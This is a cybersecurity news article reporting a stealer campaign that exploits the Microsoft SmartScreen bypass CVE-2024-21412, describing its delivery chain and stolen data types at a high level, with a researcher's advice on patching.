Cyberattackers Exploit Microsoft SmartScreen Bug in Stealer Campaign

The good news: Only organizations far behind on standard Windows patching have anything to worry about.

A Microsoft Defender SmartScreen vulnerability that was patched in February is still being used in infostealing attacks across the globe.
CVE-2024-21412 — a high severity, 8.1 CVSS-scored security bypass bug in SmartScreen — was first disclosed and fixed on Feb. 13. Since then, it has been used in campaigns involving well-known infostealers like
Lumma Stealer
,
Water Hydra
, and
DarkGate
.
Now, five months later, Fortinet has flagged yet
another campaign involving two more stealers
: Meduza and ACR. Attacks thus far have reached the US, Spain, and Thailand.
Sometimes, organizations take their time updating third-party software. By contrast, The attackers in this case are taking advantage of software thats native on Microsoft Windows, which would be updated in normal Microsoft patch cycles, notes Aamir Lakhani, global security strategist and researcher at Fortinet. Its a little unclear and concerning when these vulnerabilities are not patched, because it could indicate there are other Microsoft vulnerabilities that are not being patched as well.
If you visit a website, or download a file or program thats known to be unsafe — or is suspicious for any number of other reasons — SmartScreen will step in and present you with that famous blue screen message: Windows protected your PC. Its a simple, effective way to alert users to potentially dangerous cyber threats.
So consider how useful it would be to an attacker if they could simply disable that notification. This is what CVE-2024-21412 allows them to do.
In the latest campaign identified by Fortinet, the attackers are beating SmartScreen through the combination of PowerShell trickery and hiding attacks in images and taking advantage of how those images are processed, Lakhani explains.
First, they lure victims with a URL that triggers the download of a shortcut (LNK) file. The LNK downloads an executable with an HTML Application (HTA) script with PowerShell code for retrieving decoy PDF files and malicious code injectors.
One of the injectors is more interesting than the other. After running anti-debugging checks, it downloads a JPG image file, then uses a Windows API to access its pixels and decode its bytes, wherein lies malicious code.
These types of image-based attacks have been around a long time and, while they arent as common as other types of attacks we typically observe, we still see them pop up over time because they are quite effective, Lakhani notes. Its not surprising to see this attack, especially because [steganography] detection is often overlooked compared to other attack scenarios.
The stealers smuggled in through image files in this case get planted inside of legitimate Windows processes, at which point the gathering and exfiltration of data begins.
The kinds of information they aim for are broad. ACR, for example, steals from dozens of browsers (Google Chrome, Firefox), dozens of crypto wallets (Binance, Ledger Live), messenger apps (Telegram, WhatsApp), password managers (Bitwarden, 1Password), virtual private network (VPN) apps, email clients, file transfer protocol (FTP) clients, and more.
Only organizations far behind on standard Windows patching have anything to worry about. Clearly, though, those organizations are out there.
I would understand how individual software updates from smaller companies may be missed, but most organizations have regular Microsoft software patch updates, and this particular vulnerability remains open to attack, Lakhani says. To encourage better patching practices, he adds, I think in all cases, software vendors need to give users alerts and notifications that critical security patches exist and should be installed when the software is launched or used.

Last News
▸ ArcSight prepares for future at user conference post HP acquisition. ◂ Discovered: 07/01/2025 Category: security	▸ Samsung Epic 4G: First To Use Media Hub ◂ Discovered: 07/01/2025 Category: security	▸ Many third-party software fails security tests ◂ Discovered: 07/01/2025 Category: security

**Cyber Security Categories**
Google Dorks Database	Exploits Vulnerability	Exploit Shellcodes

CVE List

Tools/Apps

News/Aarticles

Phishing Database

Deepfake Detection

Trends/Statistics & Live Infos

Tags:
Cyberattackers Exploit Microsoft SmartScreen Bug in Stealer Campaign